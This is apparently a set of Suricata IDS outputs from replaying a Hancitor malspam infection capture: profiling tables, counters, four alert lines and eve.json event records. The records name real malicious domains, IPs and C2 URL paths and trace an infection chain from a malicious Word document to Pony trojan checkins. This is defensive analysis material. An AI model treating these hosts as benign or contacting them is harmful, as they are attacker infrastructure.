  115      2013441      1        9        33533        0.01   1        0        33533       33533.00    0.00        33533.00   
  116      2018013      1        3        52058        0.02   2        0        33279       26029.00    0.00        26029.00   
  117      2016809      1        5        1223847      0.42   61       0        32912       20063.07    0.00        20063.07   
  118      2020796      1        2        113817       0.04   5        0        32802       22763.40    0.00        22763.40   
  119      2017944      1        5        48810        0.02   2        0        32739       24405.00    0.00        24405.00   
  120      2015986      1        5        1829604      0.63   622      0        32506       2941.49     0.00        2941.49    
  121      2017901      1        5        1147212      0.40   59       0        31440       19444.27    0.00        19444.27   
  122      2023670      1        3        94920        0.03   4        2        31349       23730.00    16775.50    30684.50   
  123      2018055      1        3        30260        0.01   1        0        30260       30260.00    0.00        30260.00   
  124      2021921      1        2        2549385      0.88   162      0        30008       15736.94    0.00        15736.94   
  125      2011894      1        19       5

This file has been truncated. Go here to download in full.


packet_stats.log - (12789 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
Packet profile dump:

IP ver   Proto   cnt            min            max            avg            tot           %% 
------   -----   ----------     ------------   ------------   -----------    -----------   ---
 IPv4       6          5957          2887587      932400956     611998977       3645.7b   99.71
 IPv4      17            24          9638225      910048554     438537651         10.5b    0.29
Note: Protocol 256 tracks pseudo/tunnel packets.

Per Thread module stats:

Thread Module              IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
TMM_FLOWWORKER              IPv4       6          5957            66455       19064037        195800          1.2b   93.25
TMM_FLOWWORKER              IPv4      17            24           200817        9012513        932983         22.4m    1.79
TMM_RECEIVEPCAPFILE         IPv4       6          5791             2535        5327088          5346         31.0m    2.47
TMM_RECEIVEPCAPFILE         IPv4      17            24             2571          11068          3172         76.1k    0.01
TMM_DECODEPCAPFILE          IPv4       6          5791             2652        9628084          5347         31.0m    2.48
TMM_DECODEPCAPFILE          IPv4      17            24             2744          24392          4186        100.5k    0.01

Flow Worker            IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
flow                    IPv4       6          5791             2777          55964          3374         19.5m  1.85  
flow                    IPv4      17            24             3159          31369          5956        142.9k  0.01  
stream                  IPv4       6          5957             2839        9732866         14664         87.4m  8.28  
app-layer               IPv4      17            24             9523          63519         19573        469.8k  0.04  
detect                  IPv4       6          5957            44637       19026374        154080        917.9m  87.00 
detect                  IPv4      17            24           175246        5193427        492809         11.8m  1.12  
tcp-prune               IPv4       6          5957             2540          78566          2996         17.9m  1.69  
Note: stream includes app-layer for TCP

Per App layer parser stats:

App Layer              IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
http                    IPv4       6            67             3051          56859         16392          1.1m  48.78 
tls                     IPv4       6           328             2619          16275          2973        975.2k  43.31 
dns                     IPv4      17            24             4086          31506          7424        178.2k  7.91  
Proto detect            IPv4      17            24             5137          29098          9016        216.4k

Log Thread Module          IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---

Logger/output stats:

Logger                     IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
LOGGER_ALERT_FAST           IPv4       6             4            44824         144141         71055        284.2k  0.71  
LOGGER_UNIFIED2             IPv4       6             4            41956         215910         85822        343.3k  0.85  
LOGGER_JSON_ALERT           IPv4       6             4            67258         125547         83406        333.6k  0.83  
LOGGER_JSON_DNS             IPv4      17            22            32426        8422197        434073          9.5m  23.72 
LOGGER_JSON_HTTP            IPv4       6            66            38341         163980         77299          5.1m  12.67 
LOGGER_JSON_TLS             IPv4       6           164            33349        7587733         98232         16.1m  40.02 
LOGGER_JSON_FILE            IPv4       6           127            44802         166667         67155          8.5m  21.19 

Prefilter                        IP ver   Proto   cnt            min            max            avg            tot          %% 
--------------------             ------   -----   ----------     ------------   ------------   -----------    ---------    ---
payload                           IPv4       6          1982             2547        5863741         18467        36.6m  26.06 
payload                           IPv4      17            24             6456        4865958        230573         5.5m  3.94  
stream                            IPv4       6          1982             2541        4543406         20666        41.0m  29.16 
http_uri                          IPv4       6            66             4857         100670         10948       722.6k  0.51  
http_request_line                 IPv4       6            66             3144          24742          4459       294.3k  0.21  
http_client_body                  IPv4       6            68             2977         102540         13510       918.7k  0.65  
http_header (request)             IPv4       6            66            16059         282724         43787         2.9m  2.06  
http_header (request trailer)     IPv4       6            66             2582          19854          2916       192.5k  0.14  
http_header_names (request)       IPv4       6            66             7128        5457320         95455         6.3m  4.49  
http_accept (request)             IPv4       6            66             2932           7106          3463       228.6k  0.16  
http_referer (request)            IPv4       6            66             2833           3878          3111       205.4k  0.15  
http_content_len (request)        IPv4       6            66             2951           5310          3802       250.9k  0.18  
http_content_type (request)       IPv4       6            66             2963          22455          6778       447.4k  0.32  
http_start (request)              IPv4       6            66             5437          28750          7436       490.8k  0.35  
http_raw_header (request)         IPv4       6            68             6465          79799         11273       766.6k  0.55  
http_method                       IPv4       6            66             3341          28773          5315       350.8k  0.25  
http_cookie (request)             IPv4       6            66             3013          24088          3613       238.5k  0.17  
http_raw_uri                      IPv4       6            66             2993           6808          4034       266.3k  0.19  
http_user_agent                   IPv4       6            66             7109         150889         16539         1.1m  0.78  
http_host                         IPv4       6            66             3481          18979          5370       354.4k  0.25  
dns_query                         IPv4      17            11             7942          19022         11760       129.4k  0.09  
tls_sni                           IPv4       6           165             3038          23519          4608       760.4k  0.54  
http_response_line                IPv4       6            66             3216          27358          5761       380.3k  0.27  
http_header (response)            IPv4       6            66             8386          48084         18570         1.2m  0.87  
http_header (response trailer)    IPv4       6            66             2588           5800          4176       275.7k  0.20  
http_content_type (response)      IPv4       6            66             2844           6251          3559       234.9k  0.17  
http_raw_header (response)        IPv4       6           383             3634          30101          4981         1.9m  1.36  
http_cookie (response)            IPv4       6            66             2853          35551          3701       244.3k  0.17  
http_stat_code                    IPv4       6            66             2983          10233          3706       244.6k  0.17  
tls_cert_issuer                   IPv4       6           164             3030          22043          4172       684.2k  0.49  
tls_cert_subject                  IPv4       6           164             3260          23742          4473       733.7k  0.52  
tls_cert_serial                   IPv4       6           164             2829          18924          3876       635.8k  0.45  
file_data (http response)         IPv4       6           383             2579        5851602         88461        33.9m  24.12 
Total                             IPv4                  6944                                         20225       140.4m

General detection engine stats:

Detection phase            IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
PROF_DETECT_IPONLY          IPv4       6           460             3858          64318         17252          7.9m  0.77  
PROF_DETECT_IPONLY          IPv4      17            22            18984          47220         26365        580.0k  0.06  
PROF_DETECT_RULES           IPv4       6          5957             2527       18642945         58695        349.7m  34.07 
PROF_DETECT_RULES           IPv4      17            24            99464         223317        146354          3.5m  0.34  
PROF_DETECT_STATEFUL_START    IPv4       6           524             5118        6835857         98228         51.5m  5.02  
PROF_DETECT_STATEFUL_CONT    IPv4       6          5957             2516        6172984          5854         34.9m  3.40  
PROF_DETECT_STATEFUL_CONT    IPv4      17            24             3733          38977          8524        204.6k  0.02  
PROF_DETECT_STATEFUL_UPDATE    IPv4       6          5037             2549          61586          2814         14.2m  1.38  
PROF_DETECT_STATEFUL_UPDATE    IPv4      17            24             2619          17345          3536         84.9k  0.01  
PROF_DETECT_PREFILTER       IPv4       6          5957             7826        6506474         45314        269.9m  26.30 
PROF_DETECT_PREFILTER       IPv4      17            24            28526        4892247        264613          6.4m  0.62  
PROF_DETECT_PF_PAYLOAD      IPv4       6          1982            14993        6027005         47490         94.1m  9.17  
PROF_DETECT_PF_PAYLOAD      IPv4      17            24            11581        4871563        236555          5.7m  0.55  
PROF_DETECT_PF_TX           IPv4       6          5037             2558        5993536         16100         81.1m  7.90  
PROF_DETECT_PF_TX           IPv4      17            12             2917          28485         17690        212.3k  0.02  
PROF_DETECT_PF_SORT1        IPv4       6          1851             2529          43385          3395          6.3m  0.61  
PROF_DETECT_PF_SORT1        IPv4      17            24             3073           4842          3399         81.6k  0.01  
PROF_DETECT_PF_SORT2        IPv4       6          5957             2516          74503          2915         17.4m  1.69  
PROF_DETECT_PF_SORT2        IPv4      17            24             2845           4757          3382         81.2k  0.01  
PROF_DETECT_NONMPMLIST      IPv4       6          5957             2524          82610          3053         18.2m  1.77  
PROF_DETECT_NONMPMLIST      IPv4      17            24             2888           3821          3217         77.2k  0.01  
PROF_DETECT_ALERT           IPv4       6          5957             2521          63949          2807         16.7m  1.63  
PROF_DETECT_ALERT           IPv4      17            24             2533           5019          2885         69.2k  0.01  
PROF_DETECT_CLEANUP         IPv4       6          5957             2552          85317          2973         17.7m  1.73  
PROF_DETECT_CLEANUP         IPv4      17            24             2940           4678          3410         81.9k  0.01  
PROF_DETECT_GETSGH          IPv4       6          5957             2523       10272179          4969         29.6m  2.88  
PROF_DETECT_GETSGH          IPv4      17            24             2796           6793          5554        133.3k  0.01  


suricata-4.0.0-etopen-all-alert-2019-02-22-T-09-56-41-01282019.1218-2018-09-04-Hancitor-malspam-infection-traffic.pcap.txt - (839 bytes) - download
1
2
3
4
09/04/2018-15:47:45.825885  [**] [1:2019837:3] ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide) [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 95.213.235.149:80 -> 10.9.4.102:49165
09/04/2018-15:50:12.796998  [**] [1:2021997:3] ET POLICY External IP Lookup api.ipify.org [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.9.4.102:49173 -> 54.243.179.137:80
09/04/2018-15:50:21.605555  [**] [1:2014411:11] ET TROJAN Fareit/Pony Downloader Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49176 -> 185.66.9.184:80
09/04/2018-15:50:22.992232  [**] [1:2014411:11] ET TROJAN Fareit/Pony Downloader Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49179 -> 185.66.9.184:80


stats.log - (3238 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
------------------------------------------------------------------------------------
Date: 2/22/2019 -- 09:56:41 (uptime: 0d, 00h 00m 02s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 5815
decoder.bytes                              | Total                     | 2853064
decoder.ipv4                               | Total                     | 5815
decoder.ethernet                           | Total                     | 5815
decoder.tcp                                | Total                     | 5791
decoder.udp                                | Total                     | 24
decoder.avg_pkt_size                       | Total                     | 490
decoder.max_pkt_size                       | Total                     | 5158
flow.tcp                                   | Total                     | 230
flow.udp                                   | Total                     | 11
tcp.sessions                               | Total                     | 230
tcp.syn                                    | Total                     | 230
tcp.synack                                 | Total                     | 230
detect.alert                               | Total                     | 4
detect.mpm_list                            | Total                     | 2
detect.nonmpm_list                         | Total                     | 2
detect.match_list                          | Total                     | 2
app_layer.flow.http                        | Total                     | 66
app_layer.tx.http                          | Total                     | 66
app_layer.flow.tls                         | Total                     | 164
app_layer.flow.dns_udp                     | Total                     | 11
app_layer.tx.dns_udp                       | Total                     | 11
flow_mgr.closed_pruned                     | Total                     | 64
flow_mgr.est_pruned                        | Total                     | 11
flow.spare                                 | Total                     | 10069
flow_mgr.flows_checked                     | Total                     | 235
flow_mgr.flows_notimeout                   | Total                     | 2
flow_mgr.flows_timeout                     | Total                     | 233
flow_mgr.flows_timeout_inuse               | Total                     | 164
flow_mgr.flows_removed                     | Total                     | 69
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_skipped                      | Total                     | 65300
flow_mgr.rows_empty                        | Total                     | 2
flow_mgr.rows_maxlen                       | Total                     | 2
tcp.memuse                                 | Total                     | 573440
tcp.reassembly_memuse                      | Total                     | 81920
flow.memuse                                | Total                     | 7141984


eve.json - (166702 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
{"timestamp":"2018-09-04T15:47:38.531268+0000","flow_id":1502403872037700,"pcap_cnt":1,"event_type":"dns","src_ip":"10.9.4.102","src_port":56774,"dest_ip":"10.9.4.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":11522,"rrname":"resolutesearch.com","rrtype":"A","tx_id":0}}
{"timestamp":"2018-09-04T15:47:39.025962+0000","flow_id":1502403872037700,"pcap_cnt":2,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":56774,"proto":"UDP","dns":{"type":"answer","id":11522,"rcode":"NOERROR","rrname":"resolutesearch.com","rrtype":"A","ttl":5,"rdata":"95.213.235.149"}}
{"timestamp":"2018-09-04T15:47:45.825885+0000","flow_id":2022077735395676,"pcap_cnt":209,"event_type":"alert","src_ip":"95.213.235.149","src_port":80,"dest_ip":"10.9.4.102","dest_port":49165,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2019837,"rev":3,"signature":"ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide)","category":"Potentially Bad Traffic","severity":2},"app_proto":"http"}
{"timestamp":"2018-09-04T15:47:45.966335+0000","flow_id":2022077735395676,"pcap_cnt":235,"event_type":"http","src_ip":"10.9.4.102","src_port":49165,"dest_ip":"95.213.235.149","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"resolutesearch.com","url":"\/","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"application\/msword"}}
{"timestamp":"2018-09-04T15:48:02.158841+0000","flow_id":2022077735395676,"pcap_cnt":236,"event_type":"fileinfo","src_ip":"95.213.235.149","src_port":80,"dest_ip":"10.9.4.102","dest_port":49165,"proto":"TCP","http":{"hostname":"resolutesearch.com","url":"\/","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"application\/msword","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":212992},"app_proto":"http","fileinfo":{"filename":"invoice_149027.doc","gaps":false,"state":"CLOSED","stored":false,"size":212992,"tx_id":0}}
{"timestamp":"2018-09-04T15:50:12.339083+0000","flow_id":1492667191274635,"pcap_cnt":240,"event_type":"dns","src_ip":"10.9.4.102","src_port":59335,"dest_ip":"10.9.4.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":2042,"rrname":"api.ipify.org","rrtype":"A","tx_id":0}}
{"timestamp":"2018-09-04T15:50:12.405238+0000","flow_id":1492667191274635,"pcap_cnt":241,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":59335,"proto":"UDP","dns":{"type":"answer","id":2042,"rcode":"NOERROR","rrname":"api.ipify.org","rrtype":"CNAME","ttl":5,"rdata":"nagano-19599.herokussl.com"}}
{"timestamp":"2018-09-04T15:50:12.405238+0000","flow_id":1492667191274635,"pcap_cnt":241,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":59335,"proto":"UDP","dns":{"type":"answer","id":2042,"rcode":"NOERROR","rrname":"nagano-19599.herokussl.com","rrtype":"CNAME","ttl":5,"rdata":"elb097307-934924932.us-east-1.elb.amazonaws.com"}}
{"timestamp":"2018-09-04T15:50:12.405238+0000","flow_id":1492667191274635,"pcap_cnt":241,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":59335,"proto":"UDP","dns":{"type":"answer","id":2042,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":5,"rdata":"54.243.179.137"}}
{"timestamp":"2018-09-04T15:50:12.405238+0000","flow_id":1492667191274635,"pcap_cnt":241,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":59335,"proto":"UDP","dns":{"type":"answer","id":2042,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":5,"rdata":"23.23.114.123"}}
{"timestamp":"2018-09-04T15:50:12.405238+0000","flow_id":1492667191274635,"pcap_cnt":241,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":59335,"proto":"UDP","dns":{"type":"answer","id":2042,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":5,"rdata":"50.16.248.221"}}
{"timestamp":"2018-09-04T15:50:12.405238+0000","flow_id":1492667191274635,"pcap_cnt":241,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":59335,"proto":"UDP","dns":{"type":"answer","id":2042,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":5,"rdata":"50.19.229.252"}}
{"timestamp":"2018-09-04T15:50:12.405238+0000","flow_id":1492667191274635,"pcap_cnt":241,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":59335,"proto":"UDP","dns":{"type":"answer","id":2042,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":5,"rdata":"23.21.121.219"}}
{"timestamp":"2018-09-04T15:50:12.405238+0000","flow_id":1492667191274635,"pcap_cnt":241,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":59335,"proto":"UDP","dns":{"type":"answer","id":2042,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":5,"rdata":"54.243.123.39"}}
{"timestamp":"2018-09-04T15:50:12.796998+0000","flow_id":1987662172148715,"pcap_cnt":248,"event_type":"alert","src_ip":"10.9.4.102","src_port":49173,"dest_ip":"54.243.179.137","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2021997,"rev":3,"signature":"ET POLICY External IP Lookup api.ipify.org","category":"Potential Corporate Privacy Violation","severity":1},"app_proto":"http"}
{"timestamp":"2018-09-04T15:50:12.796998+0000","flow_id":1987662172148715,"pcap_cnt":248,"event_type":"http","src_ip":"10.9.4.102","src_port":49173,"dest_ip":"54.243.179.137","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"api.ipify.org","url":"\/","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/plain"}}
{"timestamp":"2018-09-04T15:50:12.804076+0000","flow_id":324990137550060,"pcap_cnt":249,"event_type":"dns","src_ip":"10.9.4.102","src_port":58852,"dest_ip":"10.9.4.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":25574,"rrname":"thenlorefuse.com","rrtype":"A","tx_id":0}}
{"timestamp":"2018-09-04T15:50:13.886886+0000","flow_id":324990137550060,"pcap_cnt":251,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":58852,"proto":"UDP","dns":{"type":"answer","id":25574,"rcode":"NOERROR","rrname":"thenlorefuse.com","rrtype":"A","ttl":5,"rdata":"185.66.9.184"}}
{"timestamp":"2018-09-04T15:50:14.397704+0000","flow_id":2192463392770965,"pcap_cnt":259,"event_type":"http","src_ip":"10.9.4.102","src_port":49174,"dest_ip":"185.66.9.184","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"thenlorefuse.com","url":"\/4\/forum.php","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html"}}
{"timestamp":"2018-09-04T15:50:14.397704+0000","flow_id":2192463392770965,"pcap_cnt":259,"event_type":"fileinfo","src_ip":"10.9.4.102","src_port":49174,"dest_ip":"185.66.9.184","dest_port":80,"proto":"TCP","http":{"hostname":"thenlorefuse.com","url":"\/4\/forum.php","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":566},"app_proto":"http","fileinfo":{"filename":"\/4\/forum.php","gaps":false,"state":"CLOSED","stored":false,"size":126,"tx_id":0}}
{"timestamp":"2018-09-04T15:50:14.398978+0000","flow_id":2223301257991810,"pcap_cnt":260,"event_type":"dns","src_ip":"10.9.4.102","src_port":63476,"dest_ip":"10.9.4.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":7227,"rrname":"birgroupholdings.com","rrtype":"A","tx_id":0}}
{"timestamp":"2018-09-04T15:50:14.489068+0000","flow_id":2223301257991810,"pcap_cnt":261,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":63476,"proto":"UDP","dns":{"type":"answer","id":7227,"rcode":"NOERROR","rrname":"birgroupholdings.com","rrtype":"A","ttl":5,"rdata":"184.95.44.218"}}
{"timestamp":"2018-09-04T15:50:14.854869+0000","flow_id":1892898013870488,"pcap_cnt":318,"event_type":"http","src_ip":"10.9.4.102","src_port":49175,"dest_ip":"184.95.44.218","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"birgroupholdings.com","url":"\/wp-content\/plugins\/wp-file-manager\/lib\/1","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko"}}
{"timestamp":"2018-09-04T15:50:14.855358+0000","flow_id":1892898013870488,"pcap_cnt":321,"event_type":"fileinfo","src_ip":"184.95.44.218","src_port":80,"dest_ip":"10.9.4.102","dest_port":49175,"proto":"TCP","http":{"hostname":"birgroupholdings.com","url":"\/wp-content\/plugins\/wp-file-manager\/lib\/1","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":46326},"app_proto":"http","fileinfo":{"filename":"\/wp-content\/plugins\/wp-file-manager\/lib\/1","gaps":false,"state":"CLOSED","stored":false,"size":46326,"tx_id":0}}
{"timestamp":"2018-09-04T15:50:20.873439+0000","flow_id":1975357091369951,"pcap_cnt":322,"event_type":"dns","src_ip":"10.9.4.102","src_port":53643,"dest_ip":"10.9.4.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":622,"rrname":"thenlorefuse.com","rrtype":"A","tx_id":0}}
{"timestamp":"2018-09-04T15:50:21.464489+0000","flow_id":1975357091369951,"pcap_cnt":323,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":53643,"proto":"UDP","dns":{"type":"answer","id":622,"rcode":"NOERROR","rrname":"thenlorefuse.com","rrtype":"A","ttl":5,"rdata":"185.66.9.184"}}
{"timestamp":"2018-09-04T15:50:21.605555+0000","flow_id":1747655105255709,"pcap_cnt":329,"event_type":"alert","src_ip":"10.9.4.102","src_port":49176,"dest_ip":"185.66.9.184","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2014411,"rev":11,"signature":"ET TROJAN Fareit\/Pony Downloader Checkin 2","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2018-09-04T15:50:22.152587+0000","flow_id":1747655105255709,"pcap_cnt":332,"event_type":"fileinfo","src_ip":"10.9.4.102","src_port":49176,"dest_ip":"185.66.9.184","dest_port":80,"proto":"TCP","http":{"hostname":"thenlorefuse.com","url":"\/mlu\/forum.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/html","http_method":"POST","protocol":"HTTP\/1.0","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/mlu\/forum.php","gaps":false,"state":"CLOSED","stored":false,"size":207,"tx_id":0}}
{"timestamp":"2018-09-04T15:50:22.153985+0000","flow_id":1747655105255709,"pcap_cnt":334,"event_type":"http","src_ip":"10.9.4.102","src_port":49176,"dest_ip":"185.66.9.184","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"thenlorefuse.com","url":"\/mlu\/forum.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/html"}}
{"timestamp":"2018-09-04T15:50:22.153985+0000","flow_id":1747655105255709,"pcap_cnt":334,"event_type":"fileinfo","src_ip":"185.66.9.184","src_port":80,"dest_ip":"10.9.4.102","dest_port":49176,"proto":"TCP","http":{"hostname":"thenlorefuse.com","url":"\/mlu\/forum.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/html","http_method":"POST","protocol":"HTTP\/1.0","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/mlu\/forum.php","gaps":false,"state":"CLOSED","stored":false,"size":20,"tx_id":0}}
{"timestamp":"2018-09-04T15:50:22.738803+0000","flow_id":44820831545159,"pcap_cnt":390,"event_type":"http","src_ip":"10.9.4.102","src_port":49177,"dest_ip":"184.95.44.218","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"birgroupholdings.com","url":"\/wp-content\/plugins\/wp-file-manager\/lib\/2","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko"}}
{"timestamp":"2018-09-04T15:50:22.739261+0000","flow_id":44820831545159,"pcap_cnt":393,"event_type":"fileinfo","src_ip":"184.95.44.218","src_port":80,"dest_ip":"10.9.4.102","dest_port":49177,"proto":"TCP","http":{"hostname":"birgroupholdings.com","url":"\/wp-content\/plugins\/wp-file-manager\/lib\/2","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":47399},"app_proto":"http","fileinfo":{"filename":"\/wp-content\/plugins\/wp-file-manager\/lib\/2","gaps":false,"state":"CLOSED","stored":false,"size":47399,"tx_id":0}}
{"timestamp":"2018-09-04T15:50:22.992232+0000","flow_id":1133195609176561,"pcap_cnt":415,"event_type":"alert","src_ip":"10.9.4.102","src_port":49179,"dest_ip":"185.66.9.184","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2014411,"rev":11,"signature":"ET TROJAN Fareit\/Pony Downloader Checkin 2","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2018-09-04T15:50:23.443168+0000","flow_id":1877775434547639,"pcap_cnt":597,"event_type":"http","src_ip":"10.9.4.102","src_port":49178,"dest_ip":"184.95.44.218","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"birgroupholdings.com","url":"\/wp-content\/plugins\/wp-file-manager\/lib\/3","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko"}}
{"timestamp":"2018-09-04T15:50:23.443668+0000","flow_id":1877775434547639,"pcap_cnt":600,"event_type":"fileinfo","src_ip":"184.95.44.218","src_port":80,"dest_ip":"10.9.4.102","dest_port":49178,"proto":"TCP","http":{"hostname":"birgroupholdings.com","url":"\/wp-content\/plugins\/wp-file-manager\/lib\/3","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":176301},"app_proto":"http","fileinfo":{"filename":"\/wp-content\/plugins\/wp-file-manager\/lib\/3","gaps":false,"state":"CLOSED","stored":false,"size":176301,"tx_id":0}}
{"timestamp":"2018-09-04T15:50:23.571912+0000","flow_id":1133195609176561,"pcap_cnt":602,"event_type":"fileinfo","src_ip":"10.9.4.102","src_port":49179,"dest_ip":"185.66.9.184","dest_port":80,"proto":"TCP","http":{"hostname":"thenlorefuse.com","url":"\/d2\/about.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/html","http_method":"POST","protocol":"HTTP\/1.0","status":200,"length":13},"app_proto":"http","fileinfo":{"filename":"\/d2\/about.php","gaps":false,"state":"CLOSED","stored":false,"size":236,"tx_id":0}}
